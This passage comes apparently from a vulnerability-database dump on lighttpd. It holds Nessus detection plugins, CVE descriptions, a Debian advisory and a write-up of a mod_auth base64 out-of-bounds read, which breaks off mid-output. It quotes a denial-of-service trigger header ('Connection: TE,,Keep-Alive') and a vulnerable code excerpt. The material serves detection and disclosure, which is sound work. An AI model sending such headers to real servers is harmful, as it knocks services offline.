\"lighttpd\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_http_port(default:80);\napp_info = vcf::get_app_info(app:appname, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{\"fixed_version\":\"1.4.34\"}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:55:15", "bulletinFamily": "scanner", "description": "Updated lighttpd packages fix security vulnerabilities :\n\nlighttpd before 1.4.34, when SNI is enabled, configures weak SSL\nciphers, which makes it easier for remote attackers to hijack sessions\nby inserting packets into the client-server data stream or obtain\nsensitive information by sniffing the network (CVE-2013-4508).\n\nIn lighttpd before 1.4.34, if setuid() fails for any reason, for\ninstance if an environment limits the number of processes a user can\nhave and the target uid already is at the limit, lighttpd will run as\nroot. A user who can run CGI scripts could clone() often; in this case\na lighttpd restart would end up with lighttpd running as root, and the\nCGI scripts would run as root too (CVE-2013-4559).\n\nIn lighttpd before 1.4.34, if fam is enabled and there are directories\nreachable from configured doc roots and aliases on which\nFAMMonitorDirectory fails, a remote client could trigger a DoS\n(CVE-2013-4560).", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2013-277.NASL", "href": "https://www.tenable.com/plugins/nessus/71031", "published": "2013-11-22T00:00:00", "title": "Mandriva Linux Security Advisory : lighttpd (MDVSA-2013:277)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:277. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71031);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/08/02 13:32:55\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n script_xref(name:\"MDVSA\", value:\"2013:277\");\n\n script_name(english:\"Mandriva Linux Security Advisory : lighttpd (MDVSA-2013:277)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated lighttpd packages fix security vulnerabilities :\n\nlighttpd before 1.4.34, when SNI is enabled, configures weak SSL\nciphers, which makes it easier for remote attackers to hijack sessions\nby inserting packets into the client-server data stream or obtain\nsensitive information by sniffing the network (CVE-2013-4508).\n\nIn lighttpd before 1.4.34, if setuid() fails for any reason, for\ninstance if an environment limits the number of processes a user can\nhave and the target uid already is at the limit, lighttpd will run as\nroot. A user who can run CGI scripts could clone() often; in this case\na lighttpd restart would end up with lighttpd running as root, and the\nCGI scripts would run as root too (CVE-2013-4559).\n\nIn lighttpd before 1.4.34, if fam is enabled and there are directories\nreachable from configured doc roots and aliases on which\nFAMMonitorDirectory fails, a remote client could trigger a DoS\n(CVE-2013-4560).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2013-0334.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_compress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_auth-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_cml-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_compress-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_magnet-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_mysql_vhost-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_webdav-1.4.30-6.2.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:37:10", "bulletinFamily": "scanner", "description": "Lighttpd security advisory reports :\n\nCertain Connection header values will trigger an endless loop, for\nexample : ", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_1CD3CA4233E611E2A2555404A67EEF98.NASL", "href": "https://www.tenable.com/plugins/nessus/63016", "published": "2012-11-23T00:00:00", "title": "FreeBSD : lighttpd -- remote DoS in header parsing (1cd3ca42-33e6-11e2-a255-5404a67eef98)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63016);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:42\");\n\n script_cve_id(\"CVE-2012-5533\");\n\n script_name(english:\"FreeBSD : lighttpd -- remote DoS in header parsing (1cd3ca42-33e6-11e2-a255-5404a67eef98)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Lighttpd security advisory reports :\n\nCertain Connection header values will trigger an endless loop, for\nexample : 'Connection: TE,,Keep-Alive'\n\nOn receiving such value, lighttpd will enter an endless loop,\ndetecting an empty token but not incrementing the current string\nposition, and keep reading the ',' again and again.\n\nThis bug was introduced in 1.4.31, when we fixed an 'invalid read' bug\n(it would try to read the byte before the string if it started with\n',', although the value wasn't actually used).\"\n );\n # https://vuxml.freebsd.org/freebsd/1cd3ca42-33e6-11e2-a255-5404a67eef98.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c383c1b5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"lighttpd>1.4.30<1.4.32\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-01T02:55:14", "bulletinFamily": "scanner", "description": "The http_request_split_value function in request.c in lighttpd before\n1.4.32 allows remote attackers to cause a denial of service (infinite\nloop) via a request with a header containing an empty token, as\ndemonstrated using the Connection: TE,,Keep-Alive header\n(CVE-2012-5533).", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2013-100.NASL", "href": "https://www.tenable.com/plugins/nessus/66112", "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : lighttpd (MDVSA-2013:100)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:100. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66112);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/08/02 13:32:55\");\n\n script_cve_id(\"CVE-2012-5533\");\n script_bugtraq_id(56619);\n script_xref(name:\"MDVSA\", value:\"2013:100\");\n script_xref(name:\"MGASA\", value:\"2012-0345\");\n\n script_name(english:\"Mandriva Linux Security Advisory : lighttpd (MDVSA-2013:100)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The http_request_split_value function in request.c in lighttpd before\n1.4.32 allows remote attackers to cause a denial of service (infinite\nloop) via a request with a header containing an empty token, as\ndemonstrated using the Connection: TE,,Keep-Alive header\n(CVE-2012-5533).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_compress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_auth-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_cml-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_compress-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_magnet-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_mysql_vhost-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_webdav-1.4.30-6.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2795-1 security@debian.org\r\nhttp://www.debian.org/security/ Michael Gilbert\r\nNovember 13, 2013 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : lighttpd\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2013-4508 CVE-2013-4559 CVE-2013-4560\r\nDebian Bug : 729453\r\n\r\nSeveral vulnerabilities have been discovered in the lighttpd web server.\r\n\r\nCVE-2013-4508\r\n\r\n It was discovered that lighttpd uses weak ssl ciphers when SNI (Server\r\n Name Indication) is enabled. This issue was solved by ensuring that\r\n stronger ssl ciphers are used when SNI is selected.\r\n\r\nCVE-2013-4559\r\n\r\n The clang static analyzer was used to discover privilege escalation\r\n issues due to missing checks around lighttpd's setuid, setgid, and\r\n setgroups calls. Those are now appropriately checked.\r\n\r\nCVE-2013-4560\r\n\r\n The clang static analyzer was used to discover a use-after-free issue\r\n when the FAM stat cache engine is enabled, which is now fixed.\r\n\r\nFor the oldstable distribution (squeeze), these problems have been fixed in\r\nversion 1.4.28-2+squeeze1.4.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 1.4.31-4+deb7u1.\r\n\r\nFor the testing distribution (jessie), these problems will be fixed soon.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion lighttpd_1.4.33-1+nmu1.\r\n\r\nWe recommend that you upgrade your lighttpd packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.15 (GNU/Linux)\r\n\r\niQQcBAEBCgAGBQJSgxenAAoJELjWss0C1vRzHPsgALdWQO7rsEWwjjP8fbQxsnTb\r\n7iNsBV66hCZ6W2xlSo8rVysE1QDqAptwwX3Xq0JHteM9edFlSUTyR8ir6P7Y1ISY\r\nRnBJBj3b52m+Ni/9itsiCsO+nxTwy7YI9E/mFX4/fqHBsBZ/bm/cLOcdE9pnBTyx\r\nGHMR4i1IsvrBNH0hcfnAWf2mlvX24Mvu2ViLJsPN9pjJIVtmuMFAh1LLfKvwJ104\r\ncBAMocie4KW7UtWTt6/cdXd306Sd4UbR/X5QVenvBLeFqoTStftXf91SvNjKzfO4\r\nup23uZ+CADam0mGoqDf5YnvUeCNjvKIDgHUFKMWcQ3lJgX1vOwkUP5+3WDHUI5Y+\r\nEFGYzf2/k2XL7cHykFXjHgIYrbpRHSru6attY2cC8dqMkPB6bkqXkErC3bZL67TX\r\n7Gfdm/ruVpjE3JUrxGbA9nfXYr2L2lysouTgkuP7BDB4gPYRQvmVNIaj9QXbQ66D\r\ns89PfkkHM1jqBM7+mhzanBcntf4c0buB2FwWZV9tKBel2Q0fxOTCpn1seerJzWwR\r\nWF7Ivl234rqm8AQil/KOFfx5LEd2hnfLEm04na9ujy6dzHEIP5jQ5qlckJYWj6br\r\n0bF5UnQu1I+A8z67NFdBdWgyzar0XNXkgGALPM1/59OquVKuWbqUrsZvxxv288ku\r\nFXuNnzkCs8eXGGJIl5CKABfTh7AfOXMd9dCYyDw6sA7ZlTjW/tebjrFGbyUqv5Ny\r\nZA6aweTymAzXLZ7md7hHHYDuVMLJQuLRel3DPlbThhrxa8sMsn7r51CnMS9WDxnY\r\nmwX1xpWdykttmWad6cv4K3sr73+N5SDQfaxES/Q0QVUvWjsmFYEF7aibcobaiRoO\r\n1lpZe1ThsCokR7l/o+Ja2X+sSC6mA8M+SJ83u8sfFC/Z40r3+l0sV8W7a8dQNXdt\r\ns3mGMZsFpBqcvbHNmqL11eziNekuB7W+Tngk/5cJQ07f149JtvW7yJs7X64nSmER\r\np9smvZWC0CwKuWw8U6YwvIwcZgfGjfzUlcgMmD0n+jNtymVXbDDWyxBKuGXc1JMJ\r\n6SFw59/0YgidhP8SVvQ+a2BcgO7c+Ks7uz2dcuSPvsU8CCn1XLDzApcWNzkuUjsz\r\n7oYf10AkJ770BeMg7OzmZV1lHP3JXTZeM13ae9Y+14nq0ykY4hPGcEJN15K7Esnk\r\n1uNrI8cmAK+5IkgsjEkUidF7xvsfrMX/Fu3f0uMXZCOl+Rest5yHzncqe3V/CfG6\r\nOpLsHr+unMRZ107p8xSmV/CpzWuuR9rRNdH9Cle7omjF066nP/J8KskS5zWTJoPw\r\nzmJuow5+H2uiffE+Q29u6WgCNOEp2XXrgXNLxH6RXJiSIHk//3vwrw+tPRe8D+M=\r\n=cCF1\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2013-11-18T00:00:00", "published": "2013-11-18T00:00:00", "id": "SECURITYVULNS:DOC:30003", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30003", "title": "[SECURITY] [DSA 2795-1] lighttpd security update", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "Protection bypass, privilege escalation, memory corruption.", "modified": "2013-11-18T00:00:00", "published": "2013-11-18T00:00:00", "id": "SECURITYVULNS:VULN:13405", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13405", "title": "lighttpd multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "description": "29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n\r\n\r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before the base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this vulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 